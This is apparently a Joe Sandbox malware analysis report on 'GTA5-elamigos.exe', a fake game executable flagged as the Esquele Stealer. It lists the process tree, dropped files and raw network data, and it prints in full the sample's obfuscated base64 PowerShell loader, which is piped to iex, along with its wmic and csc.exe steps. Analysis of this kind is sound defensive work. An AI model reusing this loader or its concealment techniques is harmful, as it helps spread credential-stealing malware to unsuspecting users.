Jan 7, 2025 22:14:10.497050047 CET	1236	IN	Data Raw: 23 2f 99 30 8b 33 30 8b 54 b0 62 a5 2d 8a a6 58 51 69 5e 0c 55 b4 90 4d 74 af e3 d8 54 68 ab 3e da a7 6f cf 53 fb 68 6b db 8f 0d e0 4b bb 1b 02 49 a0 40 5e 00 09 88 86 f0 e2 6e c2 4b 80 4a 5e 48 b2 bf 73 ce 9d d9 dd 40 b0 fd e3 fb c7 8f 0f 49 66 Data Ascii: #/030Tb-XQi^UMtTh>oShkKI@^nKJ^Hs@Ifs=sVp8;__[?&?6I=Z?xx).{"'r<t%cVg:]o&XSrQp8w;g=Q-
Jan 7, 2025 22:14:10.497076035 CET	1236	IN	Data Raw: 01 64 1b 24 78 93 f1 4d ac 4b 08 23 72 e7 43 76 ab e6 04 27 a2 87 b0 7f fa 2d b6 e2 1a b9 36 8f 55 9c 99 7c 55 68 20 01 09 b4 83 18 e0 fb ab e1 fd 20 0c 59 80 bc d3 9f 23 be f4 48 3c 1e bf b0 41 a8 8c 6b 0c 4e cc bd dd 20 5b a8 8e d4 07 52 a4 01 Data Ascii: d$xMK#rCv'-6U\|Uh Y#H<AkN [R5`@o13mNTTt8*'8%EMr.r9G5o\|i=\|\lB,0T8.,RP_N=pq;o&E6F0G:K{0
Jan 7, 2025 22:14:10.497087002 CET	1236	IN	Data Raw: 0a c4 1a 97 ea be 98 18 fc 2d bc 58 f7 50 5f 4f 4b 5d e1 6f 7a 5a ee 36 b3 be 01 6a c7 0d 98 dd 02 3f f7 08 b2 50 ab 84 7e 30 50 d7 f1 fb 9e da ba 8e df f4 84 51 7e 40 b8 f2 b8 00 35 c1 c3 c1 e1 af 9f f7 ea d0 97 bd 4a b2 77 bd ee 3b 24 56 28 c3 Data Ascii: -XP_OK]ozZ6j?P~0PQ~@5Jw;$V(dU<=VBM*AT6`DoY2DjEUro#Io\|?u$a:/raoS3eqTQ:]79[ UWkU/Rr]
Jan 7, 2025 22:14:10.497095108 CET	1236	IN	Data Raw: 55 7d 40 c5 47 16 15 b2 f4 05 69 77 39 72 c4 e5 07 91 c1 09 41 96 4e c6 1c 09 bc 6f 2a 92 83 03 a3 ca 7f a0 9b 37 fe f8 6d c1 a1 2d 2d 7d d3 a1 0b 27 e2 47 49 95 8b 35 4f 81 d9 7e 14 cc f6 2f ec 7b 30 dd 8f e6 a6 dc 83 f9 7e 34 27 e5 1e 4c f8 a3 Data Ascii: U}@Giw9rANo7m--}'GI5O~/{0~4'L)`)L/p.h-7Q`urJ'/YKOd=T2O7~K5%U}W"JFDzQ}\*_6wP_9Hq<<3vQRuoXy3@AO{_t@w4/dX.
Jan 7, 2025 22:14:10.497107029 CET	1236	IN	Data Raw: ab 88 3c cb 71 b4 dc b7 d8 da 9e 78 3c 3f 4c 53 d1 ba 70 6c 03 8c d7 fc 46 b2 25 d6 45 62 af c2 dd 79 f1 85 b7 86 c7 17 7a 51 ae 31 b8 30 c3 2f ae cf 81 9f f9 ce 00 db 26 8b eb 57 ba b1 05 0c 40 ce 35 dd 59 01 76 54 67 bb 35 69 93 71 ab c6 06 35 Data Ascii: <qx<?LSplF%EbyzQ10/&W@5YvTg5iq5fdlb@a\>KY'>GpC7+[\|2J`W`D]_PDxxYzEx2F?y"Fnr%VTqx!f#B7
Jan 7, 2025 22:14:10.497153044 CET	1236	IN	Data Raw: 14 95 c4 a6 ba c2 b5 3d 61 f4 fa 2c 65 97 47 9e 9f 4c cb 2c a0 be 36 e2 38 5c 9b 18 87 b7 f0 71 58 cb 97 6f 52 5f 3f ef d5 a1 2f 7b 95 ec d4 07 11 41 15 9d 7c 70 1a bf 0a a2 2a b3 26 0a 8a 92 86 8f 82 d2 56 d0 03 5c 8c f8 9f 02 6b 80 9c fc 82 b8 Data Ascii: =a,eGL,68\qXoR_?/{A\|p*&V\kmq>MI{-MTjh hFd;@Rz.!kC({uAo>x[Z3#\I;(!Vl!$+(v`P3`z`>P9Vz_
Jan 7, 2025 22:14:10.497164965 CET	1236	IN	Data Raw: d6 77 a5 df b5 fa 6d ed 45 fa 8d 7a 05 b9 59 7e 1b a6 2a be 91 c2 45 ac 10 b8 b8 b6 b6 6b bd 65 27 8d 80 2f 00 15 e7 b3 21 9e 15 c3 9b da 96 68 ea eb d0 94 04 4d 7d df 6a 2a 0a 4d 61 ac 7d 8f ee 3b 58 22 a1 ff 44 69 34 9b 7a 5a e6 d2 0b 35 97 2a Data Ascii: wmEzY~Eke'/!hM}jMa};X"Di4zZ5*vb%E_{g>5mh8^Xm4UUe]^ywa^!?Voc%B8oM!1l {:YiVf7Rj~_5\z?\Htn=;s(;.
Jan 7, 2025 22:14:10.497179031 CET	1236	IN	Data Raw: 2c 46 ef 19 75 37 06 0a 74 16 46 42 33 74 c3 9a 52 78 66 0d 86 f7 28 92 67 e5 f7 f4 f5 c4 e3 38 fa c0 4f af b4 92 7c 8e 42 91 66 ce 19 e2 19 3d c1 01 b0 16 25 17 4e 35 73 fa 12 53 06 ee 8e 80 a9 81 a6 04 b7 c0 f7 4f d8 f9 3e aa 58 39 9f e2 19 87 Data Ascii: ,Fu7tFB3tRxf(g8O\|Bf=%N5sSO>X9HZ#*%#~<n\E1?9q8!>NPl/'"Z:~jaaQetv&\\&5l^Os>v%Xxo"P}MklTq,\|P
Jan 7, 2025 22:14:10.497191906 CET	1236	IN	Data Raw: 1f 50 8b c8 83 6b 04 2e 8f 2b ac ec 51 d2 f7 4d 18 48 e0 12 41 bb 80 a6 02 6d 94 81 78 07 a5 6c 73 56 0c 13 06 a9 d6 a6 9d 6a 3d 5f d9 af b0 95 fd 32 3e 8e 86 f1 f3 75 c7 79 fc 2c 7e 22 80 da de e2 e5 5a 9b 97 a5 a5 5f c2 47 4b c3 6e e5 74 95 6b Data Ascii: Pk.+QMHAmxlsVj=_2>uy,~"Z_GKntk(S:)?3_//P4=ti FddeJ+Z&ZH`hUgeG_G4b] %s<<;iGa\|KjhQnF.[<
Jan 7, 2025 22:14:10.502001047 CET	1236	IN	Data Raw: f5 3e 80 71 dc 0f ed a0 28 c1 c8 d2 31 4c 4a a3 c4 52 bf f4 8f d8 e1 be e4 ba 2c 57 1a 45 32 ed 2e 55 cd 1b 5f 2c 11 1c 73 96 2e fe 83 43 15 ba e2 87 48 d3 c3 b8 48 57 23 87 f2 54 c1 52 2f 58 92 06 25 b9 c3 4a dc 50 92 33 ac c4 05 25 d9 c3 4a 9c Data Ascii: >q(1LJR,WE2.U_,s.CHHW#TR/X%JP3%JPV"@Io+7sz(9wf 6aJ3U2!V)wHRZ- \804Zr<<4+oh`W\/p-kR}M)umk]9

Target ID:	0
Start time:	16:13:35
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\GTA5-elamigos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GTA5-elamigos.exe"
Imagebase:	0x7ff70bcb0000
File size:	34'434'422 bytes
MD5 hash:	B885BDBA1AE235BEF39832702ABC5B03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Rust
Yara matches:	Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2040181571.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2186944875.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2190655984.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2186572194.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2187457928.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2193159338.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2043784374.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2042780701.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2189549532.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2187591917.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2187294963.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2041506674.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2187177452.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2046992835.0000024F20469000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_EsqueleStealer, Description: Yara detected Esquele Stealer, Source: 00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	16:13:37
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	16:13:39
Start date:	07/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"
Imagebase:	0x7ff685100000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	16:13:40
Start date:	07/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE4C.tmp" "c:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP"
Imagebase:	0x7ff68bcd0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	16:13:52
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	16:13:53
Start date:	07/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"
Imagebase:	0x7ff685100000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	16:14:07
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic" csproduct get uuid /value
Imagebase:	0x7ff6dbc20000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	16:16:30
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path \"C:\WindowsTasks\Updates\Update-m876kK3CBP.zip\" -DestinationPath \"C:\WindowsTasks\Platform\App-rRrqar5TwQ\"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GTA5-elamigos.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\netsuser.dll

C:\ProgramData\usdata.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.0.cs

C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline

C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.dll

C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.out

C:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP

C:\Users\user\AppData\Local\Temp\RES12D9.tmp

C:\Users\user\AppData\Local\Temp\RESDE4C.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52txs1sj.sdl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlxz3ckk.ove.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ij24gnjp.bzl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iw5mghv1.5q1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prhhb53h.oad.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0s13kym.pwb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uesyecsd.1e0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmdb5evs.mhq.psm1

Windows Analysis Report
GTA5-elamigos.exe

Function 00007FF848F2B124 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Function 00007FF848FF53DB Relevance: .4, Instructions: 417
COMMON

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
